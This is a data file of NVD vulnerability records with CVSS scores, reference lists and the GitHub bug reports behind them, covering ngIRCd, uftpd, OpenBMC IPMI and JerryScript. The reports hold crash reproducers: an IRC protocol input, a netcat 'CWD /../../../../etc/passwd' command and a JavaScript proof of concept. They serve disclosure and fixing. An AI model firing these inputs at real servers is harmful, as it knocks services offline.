argv=<optimized out>) at ngircd.c:317 ```
iconv-related crash (AFL)
https://api.github.com/repos/ngircd/ngircd/issues/274/comments
2
2020-05-10T16:39:55Z
2023-01-02T14:31:25Z
https://github.com/ngircd/ngircd/issues/274
615,429,224
274
1,280
CVE-2020-14148
2020-06-15T18:15:15.067
The Server-Server protocol implementation in ngIRCd before 26~rc2 allows an out-of-bounds access, as demonstrated by the IRC_NJOIN() function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/issues/274" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/issues/277" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/pull/275" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/pull/276" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/releases/tag/rel-26-rc2" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00023.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BJOYV5GHUFJMUVQW3TJKXZ7JPXL4W3ER/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JZRYFJIA6ZKOH7U4K5WH5OL7OKXE4N52/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/issues/274" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/issues/277" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/pull/275" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/pull/276" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ngircd/ngircd/releases/tag/rel-26-rc2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/06/msg00023.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BJOYV5GHUFJMUVQW3TJKXZ7JPXL4W3ER/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JZRYFJIA6ZKOH7U4K5WH5OL7OKXE4N52/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:barton:ngircd:*:*:*:*:*:*:*:*", "matchCriteriaId": "5A04351C-B842-4BD8-97EC-30534FA95055", "versionEndExcluding": null, "versionEndIncluding": "25.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:barton:ngircd:26.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "A9B51CBB-87E4-4937-93EB-CBA5074F0C68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ngircd/ngircd/issues/277
[ "Third Party Advisory" ]
github.com
[ "ngircd", "ngircd" ]
I have found an out-of-bounds error by fuzzing ngircd using AFL and libdislocate (a custom memory allocator). `Conn_Write` is called with `Idx=-1` which leads to a crash when accessing `My_Connections[Idx].sock`. The binary is built from `rel-26-rc1` with patches to fix #275 and #276 and `__AFL_INIT()` patched into `Conn_InitListeners` in order to support `afl-clang-fast`. Build flags: ./configure --without-syslog CC=afl-clang-fast Run mode: ngircd -n -f src/testsuite/ngircd-test1.conf Input ([id:000000,sig:11,src:001568,time:131476447,op:ext_AO,pos:224-min.txt](https://github.com/ngircd/ngircd/files/4617756/id.000000.sig.11.src.001568.time.131476447.op.ext_AO.pos.224-min.txt)): ``` PASS pwd1 0000-IRC+ |:CHL 0 SERVER ngircd.test.server3 : : 376 ngircd.test.server : :ngircd.test.server3 NICK Nic0N00e 0 0 0 1 0 : :ngircd.test.server3 NJOIN #00000 :@Nic0N00e :ngircd.test.server3 NJOIN 0 :ngircd.test.server! ``` Stacktrace: ``` #0 0x000000000041eb58 in Conn_Write (Idx=-1, Data=<optimized out>, Len=63) at conn.c:937 #1 Conn_WriteStr (Idx=-1, Format=<optimized out>) at conn.c:885 #2 0x00000000004404a0 in IRC_WriteStrClientPrefix (Client=<optimized out>, Prefix=0x7ffff7ce9e60, Format=<optimized out>) at irc-write.c:150 #3 0x0000000000440271 in IRC_WriteErrClient (Client=0x7ffff7ce9e60, Format=<optimized out>) at irc-write.c:73 #4 0x0000000000408966 in Channel_Join (Client=0x7ffff7ce9e60, Name=0x7ffff7cbdef2 "0") at channel.c:261 #5 0x000000000043f1dc in IRC_NJOIN (Client=0x7ffff7cbfe60, Req=0x7fffffffdff0) at irc-server.c:286 #6 0x00000000004471d7 in Handle_Request (Idx=<optimized out>, Req=0x7fffffffdff0) at parse.c:544 #7 Parse_Request (Idx=7, Request=<optimized out>) at parse.c:267 #8 0x000000000041e618 in Handle_Buffer (Idx=7) at conn.c:1820 #9 0x000000000041d949 in Conn_Handler () at conn.c:687 #10 0x00000000004053d9 in main (argc=<optimized out>, argv=<optimized out>) at ngircd.c:317 ```
Conn_Write: out-of-bounds index access (AFL + libdislocate)
https://api.github.com/repos/ngircd/ngircd/issues/277/comments
2
2020-05-12T18:35:15Z
2023-01-02T14:31:37Z
https://github.com/ngircd/ngircd/issues/277
616,871,665
277
1,281
CVE-2020-14149
2020-06-15T18:15:15.147
In uftpd before 2.12, handle_CWD in ftpcmd.c mishandled the path provided by the user, causing a NULL pointer dereference and denial of service, as demonstrated by a CWD /.. command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00052.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/726308" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/troglobit/uftpd/issues/30" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/troglobit/uftpd/releases/tag/v2.12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00052.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/726308" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/troglobit/uftpd/issues/30" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/troglobit/uftpd/releases/tag/v2.12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:troglobit:uftpd:*:*:*:*:*:*:*:*", "matchCriteriaId": "BCA9C907-3944-4BA8-957C-7292B017966C", "versionEndExcluding": "2.12", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/troglobit/uftpd/issues/30
[ "Exploit", "Third Party Advisory" ]
github.com
[ "troglobit", "uftpd" ]
Hi! I found a bug that crashes the forked child pre-authenticated. The details are as follows: ## Triggering the Bug ```shell root@5829efcb25f7:/opt/uftpd# uftpd -v 2.11 root@5829efcb25f7:/opt/uftpd# uftpd -n /tmp root@5829efcb25f7:/opt# nc 127.0.0.1 21 220 uftpd (2.11) ready. CWD /../../../../../../../etc/passwd root@5829efcb25f7:/opt/uftpd# dmesg ... [40553.625757] uftpd[75111]: segfault at 0 ip 00007f6806a484e5 sp 00007ffda5d8c1c8 error 4 in libc-2.31.so[7f68068e2000+178000] [40553.625771] Code: 00 00 0f 1f 00 31 c0 c5 f8 77 c3 66 2e 0f 1f 84 00 00 00 00 00 f3 0f 1e fa 89 f9 48 89 fa c5 f9 ef c0 83 e1 3f 83 f9 20 77 2b <c5> fd 74 0f c5 fd d7 c1 85 c0 0f 85 eb 00 00 00 48 83 c7 20 83 e1 ``` output of GDB session attached to `uftpd -n /tmp`: ``` [Attaching after process 2761 fork to child process 2776] [New inferior 2 (process 2776)] [Detaching after fork from parent process 2761] [Inferior 1 (process 2761) detached] Thread 2.1 "uftpd" received signal SIGSEGV, Segmentation fault. [Switching to process 2776] __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65 65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or directory. (gdb) x/i $Pc Value can't be converted to integer. (gdb) x/i $pc => 0x7f3898d354e5 <__strlen_avx2+21>: vpcmpeqb (%rdi),%ymm0,%ymm1 (gdb) disass Dump of assembler code for function __strlen_avx2: 0x00007f3898d354d0 <+0>: endbr64 0x00007f3898d354d4 <+4>: mov %edi,%ecx 0x00007f3898d354d6 <+6>: mov %rdi,%rdx 0x00007f3898d354d9 <+9>: vpxor %xmm0,%xmm0,%xmm0 0x00007f3898d354dd <+13>: and $0x3f,%ecx 0x00007f3898d354e0 <+16>: cmp $0x20,%ecx 0x00007f3898d354e3 <+19>: ja 0x7f3898d35510 <__strlen_avx2+64> => 0x00007f3898d354e5 <+21>: vpcmpeqb (%rdi),%ymm0,%ymm1 ``` registers ``` (gdb) i r rax 0x556208658f59 93879536029529 rbx 0x556208bd0550 93879541761360 rcx 0x0 0 rdx 0x0 0 rsi 0x7ffcf35cb960 140724391426400 rdi 0x0 0 ... ``` `rdi` is 0 the stack trace is as follows: ``` (gdb) where #0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65 #1 0x0000556208652768 in handle_CWD (ctrl=0x556208bd0550, path=<optimized out>) at ftpcmd.c:407 #2 0x0000556208654c37 in read_client_command (w=<optimized out>, arg=0x556208bd0550, events=<optimized out>) at ftpcmd.c:1586 #3 0x00007f3898daad37 in uev_run (ctx=0x556208bd0520, flags=flags@entry=0) at uev.c:415 #4 0x0000556208656a96 in ftp_command (ctrl=0x556208bd0550) at ftpcmd.c:1610 #5 ftp_session (ctx=<optimized out>, sd=<optimized out>) at ftpcmd.c:1652 #6 0x00007f3898daad37 in uev_run (ctx=0x7ffcf35ccf60, flags=0) at uev.c:415 #7 0x0000556208650597 in serve_files (ctx=0x7ffcf35ccf60) at uftpd.c:247 #8 main (argc=<optimized out>, argv=<optimized out>) at uftpd.c:405 ``` the relevant source code in `ftpcmd.c` ```c static void handle_CWD(ctrl_t *ctrl, char *path) { struct stat st; char *dir; if (!path) goto done; /* * Some FTP clients, most notably Chrome, use CWD to check if an * entry is a file or directory. */ dir = compose_abspath(ctrl, path); if (!dir || stat(dir, &st) || !S_ISDIR(st.st_mode)) { DBG("chrooted:%d, ctrl->cwd: %s, home:%s, dir:%s, len:%zd, dirlen:%zd", chrooted, ctrl->cwd, home, dir, strlen(home), strlen(dir)); send_msg(ctrl->sd, "550 No such directory.\r\n"); return; } // ... ``` `if (!dir ...` so `dir` might be `NULL` but will be used in the `DBG()` macro with a call to `strlen(dir)`. As can be seen from the stack trace `dir == $rdi` and is `NULL (0)` at this point which causes the crash. To force `dir == NULL` we can look at `compose_abspath` in `common.c` which calls `compose_path` here `ptr = compose_path(ctrl, path);` and `return ptr;` returns the pointer at the end of the function: ```c char *compose_abspath(ctrl_t *ctrl, char *path) { char *ptr; char cwd[sizeof(ctrl->cwd)]; if (path && path[0] == '/') { strlcpy(cwd, ctrl->cwd, sizeof(cwd)); memset(ctrl->cwd, 0, sizeof(ctrl->cwd)); } ptr = compose_path(ctrl, path); if (path && path[0] == '/') strlcpy(ctrl->cwd, cwd, sizeof(ctrl->cwd)); return ptr; } ``` So we have to look at `compose_path` in `common.h`. The trace that leads to `dir == NULL` is the following: ```c time | char dir[PATH_MAX] = { 0 }; | strlcpy(dir, ctrl->cwd, sizeof(dir)); | DBG("Compose path from cwd: %s, arg: %s", ctrl->cwd, path ?: ""); | if (!path || !strlen(path)) | if (path[0] != '/') { | strlcat(dir, path, sizeof(dir)); | while ((ptr = strstr(dir, "//"))) | if (!chrooted) { | if (!stat(dir, &st) && S_ISDIR(st.st_mode)) { | name = basename(path); | ptr = dirname(dir); | memset(rpath, 0, sizeof(rpath)); | if (!realpath(ptr, rpath)) { | INFO("Failed realpath(%s): %m", ptr); v return NULL; ``` Best Martin
Null Pointer Dereference / Crash
https://api.github.com/repos/troglobit/uftpd/issues/30/comments
1
2020-05-21T14:54:52Z
2020-05-22T06:44:25Z
https://github.com/troglobit/uftpd/issues/30
622,557,607
30
1,282
CVE-2020-14156
2020-06-15T18:15:15.207
user_channel/passwd_mgr.cpp in OpenBMC phosphor-host-ipmid before 2020-04-03 does not ensure that /etc/ipmi-pass has strong file permissions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/openbmc/openbmc/issues/3670" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openbmc/phosphor-host-ipmid/commit/b265455a2518ece7c004b43c144199ec980fc620" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.ozlabs.org/pipermail/openbmc/2020-June/022020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/openbmc/openbmc/issues/3670" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/openbmc/phosphor-host-ipmid/commit/b265455a2518ece7c004b43c144199ec980fc620" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.ozlabs.org/pipermail/openbmc/2020-June/022020.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openbmc-project:openbmc:*:*:*:*:*:*:*:*", "matchCriteriaId": "AE58FF9E-003C-46AB-9FCE-2A21807009C7", "versionEndExcluding": "2020-04-03", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "276" ]
276
https://github.com/openbmc/openbmc/issues/3670
[ "Third Party Advisory" ]
github.com
[ "openbmc", "openbmc" ]
OpenBMC Security Advisory Title: CVE-2020-14156. Network IPMI before 2020-04-03 does not ensure the `/etc/ipmi_pass` file has strong file permissions. The `/etc/ipmi_pass` file was created with world-readable permission. Any user with SSH or SCP access to the BMC can read and decode the credentials and escalate to any IPMI user. A mitigation is to log into the BMC as the root user and change the file permission to 600 (read write only by the owner): `chmod 600 /etc/ipmi_pass`. The fix is in openbmc/phosphor-host-ipmid commit b265455a2518ece7c004b43c144199ec980fc620, here: https://github.com/openbmc/phosphor-host-ipmid/commit/b265455a2518ece7c004b43c144199ec980fc620 For more information, see OpenBMC contact information at https://github.com/openbmc/openbmc file README.md. Credit for finding this problem: Michael Henry, Intel Corporation
Security Advisory for CVE-2020-14156 - Network IPMI file permissions
https://api.github.com/repos/openbmc/openbmc/issues/3670/comments
2
2020-06-15T14:49:16Z
2020-08-17T13:31:48Z
https://github.com/openbmc/openbmc/issues/3670
638,914,866
3,670
1,283
CVE-2020-14163
2020-06-15T21:15:10.553
An issue was discovered in ecma/operations/ecma-container-object.c in JerryScript 2.2.0. Operations with key/value pairs did not consider the case where garbage collection is triggered after the key operation but before the value operation, as demonstrated by improper read access to memory in ecma_gc_set_object_visited in ecma/base/ecma-gc.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/commit/c2b662170245a16f46ce02eae68815c325d99821" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3804" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/commit/c2b662170245a16f46ce02eae68815c325d99821" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3804" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/jerryscript-project/jerryscript/issues/3804
[ "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 7a20150ae747742c178e7d61bb4b3c71476925e2 ###### Build platform Ubuntu 18.04.4 LTS (Linux 4.15.0-91-generic x86_64) and ProductName: Mac OS X ProductVersion: 10.15.4 BuildVersion: 19E287 ###### Build steps ```sh python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case - to reproduce the bug for this PoC, keep the same filename length and run the interpreter providing the basename only, as in the Execution steps below. - filename: 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js' ```javascript function main() { var v2 = [1337]; var v3 = [13.37,v2]; var v7 = 0; while (v7 < 6) { var v10 = [13.37,13.37,"object"]; var v14 = [13.37]; var v16 = [v14,v10]; var v17 = {e:1337,__proto__:v16,valueOf:-9007199254740991,toString:WeakSet}; var v19 = [Int8Array,v17]; var v21 = new Map(v19); var v22 = v3.unshift(0); } } main(); ``` ###### Execution steps ```sh ~/jerryscript-test/build/bin/jerry xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js ASAN:DEADLYSIGNAL ================================================================= ==15897==ERROR: AddressSanitizer: SEGV on unknown address 0x55e63e629888 (pc 0x55e6393d7f9d bp 0x000004e7ffe3 sp 0x7fff9494ba70 T0) ==15897==The signal is caused by a READ memory access. #0 0x55e6393d7f9c in ecma_gc_set_object_visited /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:85 #1 0x55e6393d7707 in ecma_gc_mark_map_object /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:330 #2 0x55e6393d7707 in ecma_gc_mark /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:594 #3 0x55e6393d88a4 in ecma_gc_run /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:1395 #4 0x55e6393d15bd in jmem_heap_realloc_block /home/jerryscript-test/jerry-core/jmem/jmem-heap.c:539 #5 0x55e6393d9da4 in ecma_collection_push_back /home/jerryscript-test/jerry-core/ecma/base/ecma-helpers-collection.c:140 #6 0x55e6393f13ee in ecma_op_internal_buffer_append /home/jerryscript-test/jerry-core/ecma/operations/ecma-container-object.c:71 #7 0x55e6393f13ee in ecma_op_container_set /home/jerryscript-test/jerry-core/ecma/operations/ecma-container-object.c:790 #8 0x55e6393ea3cf in ecma_builtin_dispatch_routine /home/jerryscript-test/jerry-core/ecma/builtin-objects/ecma-builtins.c:1115 #9 0x55e6393ea3cf in ecma_builtin_dispatch_call /home/jerryscript-test/jerry-core/ecma/builtin-objects/ecma-builtins.c:1139 #10 0x55e6393f6491 in ecma_op_function_call /home/jerryscript-test/jerry-core/ecma/operations/ecma-function-object.c:1085 #11 0x55e6393f0ec4 in ecma_op_container_create /home/jerryscript-test/jerry-core/ecma/operations/ecma-container-object.c:516 #12 0x55e6393ea525 in ecma_builtin_dispatch_construct /home/jerryscript-test/jerry-core/ecma/builtin-objects/ecma-builtins.c:1180 #13 0x55e63942fb2e in opfunc_construct /home/jerryscript-test/jerry-core/vm/vm.c:849 #14 0x55e63942fb2e in vm_execute /home/jerryscript-test/jerry-core/vm/vm.c:4151 #15 0x55e63942ff2c in vm_run /home/jerryscript-test/jerry-core/vm/vm.c:4232 #16 0x55e6393f4ffd in ecma_op_function_call_simple /home/jerryscript-test/jerry-core/ecma/operations/ecma-function-object.c:886 #17 0x55e6393f6491 in ecma_op_function_call /home/jerryscript-test/jerry-core/ecma/operations/ecma-function-object.c:1085 #18 0x55e63942ee5b in opfunc_call /home/jerryscript-test/jerry-core/vm/vm.c:764 #19 0x55e63942ee5b in vm_execute /home/jerryscript-test/jerry-core/vm/vm.c:4130 #20 0x55e63942ff2c in vm_run /home/jerryscript-test/jerry-core/vm/vm.c:4232 #21 0x55e6393d3b9d in jerry_run /home/jerryscript-test/jerry-core/api/jerry.c:595 #22 0x55e6393cf64d in main /home/jerryscript-test/jerry-main/main-unix.c:759 #23 0x7fa01742eb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #24 0x55e6393d1969 in _start (/home/jerryscript-test/build/bin/jerry+0x1a969) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:85 in ecma_gc_set_object_visited ==15897==ABORTING ``` ``` ~/jerryscript-asan-debug/build/bin/jerry xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js ICE: Assertion '((jmem_cpointer_t) uint_ptr) == uint_ptr' failed at /home/jerryscript-asan-debug/jerry-core/jmem/jmem-allocator.c(jmem_decompress_pointer):219. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` ###### Backtrace ``` $ gdb -nx -q ~/jerryscript-test/build/bin/jerry -ex 'r xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js' Reading symbols from /home/jerryscript-test/build/bin/jerry...done. Starting program: /home/jerryscript-test/build/bin/jerry xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.js [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x0000555555574f9d in ecma_gc_set_object_visited (object_p=0x55555a7c6888) at /home/jerryscript-test/jerry-core/ecma/base/ecma-gc.c:85 85 if (object_p->type_flags_refs >= ECMA_OBJECT_NON_VISITED) (gdb) x/i $rip => 0x555555574f9d <ecma_gc_set_object_visited+35>: mov (%rdi),%ax (gdb) x/g $rdi 0x55555a7c6888: Cannot access memory at address 0x55555a7c6888 ```
Memory corruption in ecma_gc_set_object_visited (jerry-core/ecma/base/ecma-gc.c:85)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3804/comments
0
2020-05-27T18:29:22Z
2020-05-28T05:55:17Z
https://github.com/jerryscript-project/jerryscript/issues/3804
625,930,295
3,804
1,284
CVE-2020-14195
2020-06-16T16:15:11.107
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to org.jsecurity.realm.jndi.JndiRealmFactory (aka org.jsecurity).
